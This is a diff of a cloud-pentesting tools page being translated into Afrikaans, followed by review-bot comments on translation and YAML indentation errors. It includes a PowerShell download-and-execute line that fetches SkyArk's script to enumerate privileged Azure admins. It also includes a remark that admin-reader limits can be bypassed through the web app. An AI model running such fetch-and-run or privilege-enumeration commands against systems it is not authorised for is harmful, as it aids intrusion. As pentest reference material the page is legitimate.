-e NEO4j_PASSWORD="s3cr3t" \ - ghcr.io/lyft/cartography \ - --neo4j-uri bolt://host.docker.internal:7687 \ - --neo4j-password-env-var NEO4j_PASSWORD \ - --neo4j-user neo4j +--volume "$HOME/.config/gcloud/application_default_credentials.json:/application_default_credentials.json" \ +-e GOOGLE_APPLICATION_CREDENTIALS="/application_default_credentials.json" \ +-e NEO4j_PASSWORD="s3cr3t" \ +ghcr.io/lyft/cartography \ +--neo4j-uri bolt://host.docker.internal:7687 \ +--neo4j-password-env-var NEO4j_PASSWORD \ +--neo4j-user neo4j # It only checks for a few services inside GCP (https://lyft.github.io/cartography/modules/gcp/index.html) 
@@ -326,17 +297,15 @@ docker run --platform linux/amd64 \ ## Google Kubernetes Engine ### If you can run starbase or purplepanda you will get more info ``` - {{#endtab }} {{#endtabs }} ### [**starbase**](https://github.com/JupiterOne/starbase) -Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database. +Starbase versamel bates en verhoudings van dienste en stelsels, insluitend wolkinfrastruktuur, SaaS-toepassings, sekuriteitsbeheer, en meer in 'n intuĂŻtiewe grafiekweergave wat deur die Neo4j-databasis ondersteun word. {{#tabs }} -{{#tab name="Install" }} - +{{#tab name="Installeer" }} ```bash # You are going to need Node version 14, so install nvm following https://tecadmin.net/install-nvm-macos-with-homebrew/ npm install --global yarn 
@@ -359,44 +328,40 @@ docker build --no-cache -t starbase:latest . docker-compose run starbase setup docker-compose run starbase run ``` - {{#endtab }} {{#tab name="GCP" }} - ```yaml ## Config for GCP ### Check out: https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md ### It requires service account credentials integrations: - - name: graph-google-cloud - instanceId: testInstanceId - directory: ./.integrations/graph-google-cloud - gitRemoteUrl: https://github.com/JupiterOne/graph-google-cloud.git - config: - SERVICE_ACCOUNT_KEY_FILE: "{Check https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md#service_account_key_file-string}" - PROJECT_ID: "" - FOLDER_ID: "" - ORGANIZATION_ID: "" - CONFIGURE_ORGANIZATION_PROJECTS: false +- name: graph-google-cloud +instanceId: testInstanceId +directory: ./.integrations/graph-google-cloud +gitRemoteUrl: https://github.com/JupiterOne/graph-google-cloud.git +config: +SERVICE_ACCOUNT_KEY_FILE: "{Check https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md#service_account_key_file-string}" +PROJECT_ID: "" +FOLDER_ID: "" +ORGANIZATION_ID: "" +CONFIGURE_ORGANIZATION_PROJECTS: false storage: - engine: neo4j - config: - username: neo4j - password: s3cr3t - uri: bolt://localhost:7687 - #Consider using host.docker.internal if from docker +engine: neo4j +config: +username: neo4j +password: s3cr3t +uri: bolt://localhost:7687 +#Consider using host.docker.internal if from docker ``` - {{#endtab }} {{#endtabs }} ### [**SkyArk**](https://github.com/cyberark/SkyArk) -Discover the most privileged users in the scanned AWS or Azure environment, including the AWS Shadow Admins. It uses powershell. - +Ontdek die mees bevoorregte gebruikers in die gescande AWS of Azure omgewing, insluitend die AWS Shadow Admins. Dit gebruik powershell. ```powershell Import-Module .\SkyArk.ps1 -force Start-AzureStealth 
@@ -405,18 +370,17 @@ Start-AzureStealth IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1') Scan-AzureAdmins ``` - ### [Cloud Brute](https://github.com/0xsha/CloudBrute) -A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). +'n Gereedskap om 'n maatskappy (teiken) infrastruktuur, lĂȘers en toepassings op die top wolkverskaffers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode) te vind. ### [CloudFox](https://github.com/BishopFox/cloudfox) -- CloudFox is a tool to find exploitable attack paths in cloud infrastructure (currently only AWS & Azure supported with GCP upcoming). -- It is an enumeration tool which is intended to compliment manual pentesting. -- It doesn't create or modify any data within the cloud environment. +- CloudFox is 'n gereedskap om uitbuitbare aanvalspaaie in wolkinfrastruktuur te vind (huidiglik slegs AWS & Azure ondersteun met GCP wat kom). +- Dit is 'n enumerasie-gereedskap wat bedoel is om handmatige pentesting aan te vul. +- Dit skep of wysig nie enige data binne die wolkomgewing nie. -### More lists of cloud security tools +### Meer lyste van wolk sekuriteitsgereedskap - [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec) 
@@ -446,16 +410,12 @@ aws-security/ azure-security/ {{#endref}} -### Attack Graph +### Aanval Grafiek -[**Stormspotter** ](https://github.com/Azure/Stormspotter)creates an “attack graph” of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work. +[**Stormspotter** ](https://github.com/Azure/Stormspotter) skep 'n “aanval grafiek” van die hulpbronne in 'n Azure intekening. Dit stel rooi span en pentesters in staat om die aanvaloppervlak en draaipunte binne 'n huurder te visualiseer, en versterk jou verdedigers om vinnig te oriĂ«nteer en prioriteit te gee aan insidentresponswerk. ### Office365 -You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a little bit limited). However, those limitations appear in some PS modules and can be bypassed accessing the features **via the web application**. +Jy het **Global Admin** of ten minste **Global Admin Reader** nodig (maar let daarop dat Global Admin Reader 'n bietjie beperk is). Hierdie beperkings verskyn egter in sommige PS modules en kan omseil word deur toegang te verkry tot die funksies **via die webtoepassing**. {{#include ../banners/hacktricks-training.md}} - - - -
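Review bot: the translated integrations bullet in hunk `@@ -6,35 +6,31 @@` contains a word split in two, "wat in GCR gehos te is"; this should be a single word (for example "wat in GCR gehuisves word"), otherwise the sentence reads as a typo in the rendered page.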
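Review bot: the PurplePanda GCP tab in hunk `@@ -54,29 +53,25 @@` replaces the indented `  service_account_id: "some-sa-email@sidentifier.iam.gserviceaccount.com"` line with an unindented `+service_account_id: ...`. The string piped into `base64` is YAML, and the leading spaces are what made `service_account_id` a field of the same list entry as `- file_path: ""`; at column 0 it is no longer part of that entry and the document does not parse as intended. This is a whitespace-only change with nothing to translate, so restore the original line.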
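Review bot: the ScoutSuite GCP loop in hunk `@@ -135,42 +124,36 @@` only strips the leading whitespace from the four lines inside `for pid in ...; do ... done`. Bash does not care, but the change is unrelated to the translation and makes the loop body harder to read; keep code blocks byte-identical to the English source so that future diffs against it stay minimal.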
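Review bot: in hunk `@@ -183,13 +166,11 @@` the blank line between `Kontroleer alle Projekte` and the paragraph `Om al die projekte te kontroleer, ...` was dropped. In Markdown two adjacent text lines are rendered as one paragraph, so the title line that previously stood on its own now runs into the sentence after it; reinsert the blank line (or make it a heading, matching how the rest of the page introduces sections).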
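Review bot: the `gcp.spc` generator in hunk `@@ -197,32 +178,30 @@` has the indentation stripped from the `plugin`, `project`, `type` and `connections` lines inside both `connection` blocks. HCL accepts this, so the generated file still works, but the block is a code sample that needs no translation and the whitespace removal only adds noise; revert it. While touching this block, the comment `# Generate the aggragator to call` could be corrected to `aggregator`.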
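Review bot: hunk `@@ -246,29 +225,27 @@` translates "plugins" as `AWS-inproppe` (`+Meer AWS-inproppe van Steampipe`), while the GCP tab in the previous hunk keeps the English word (`+Meer GCP plugins van Steampipe`). Pick one term for the whole page. In the same hunk, `om Bate (Gasname, IP Adresse) ... te verkry` should use the plural `Bates`, as the cartography paragraph later does (`infrastruktuur bates`).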
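Review bot: hunk `@@ -276,46 +253,40 @@` renames the cloudlist tab to `{{#tab name="Tweede Tab" }}`, translating a placeholder ("Second Tab") that should never have been shown; the tab holds the GCP usage (`## For GCP it requires service account JSON credentials`), so name it `GCP` like every other tool's second tab. In the same hunk the cartography `{{#tab name="Install" }}` line is left in English, while CloudSploit, ScoutSuite, Steampipe and starbase all became `Installeer`; and the continuation lines of the `docker run --platform linux/amd64 \` command lose their indentation, a whitespace-only change that should be reverted.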
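Review bot: the starbase GCP config in hunk `@@ -359,44 +328,40 @@` has every indentation level removed from a YAML block, which changes its meaning: `instanceId`, `directory`, `gitRemoteUrl` and `config` are no longer nested under the `- name: graph-google-cloud` list item, `SERVICE_ACCOUNT_KEY_FILE` through `CONFIGURE_ORGANIZATION_PROJECTS` are no longer under `config:`, and `engine`/`config` are no longer under `storage:`. A YAML parser rejects a mapping key at the same column directly after a sequence entry, so the file cannot be loaded as written. Revert the block to the original indentation; only the prose on this page needs translating.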
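Review bot: the Stormspotter line in hunk `@@ -446,16 +410,12 @@` keeps the stray space inside the link text, `[**Stormspotter** ](https://github.com/Azure/Stormspotter)`, and now adds a second space after the closing parenthesis. Since the line is being rewritten anyway, change it to `[**Stormspotter**](https://github.com/Azure/Stormspotter) skep ...` so the rendered link does not carry a trailing space.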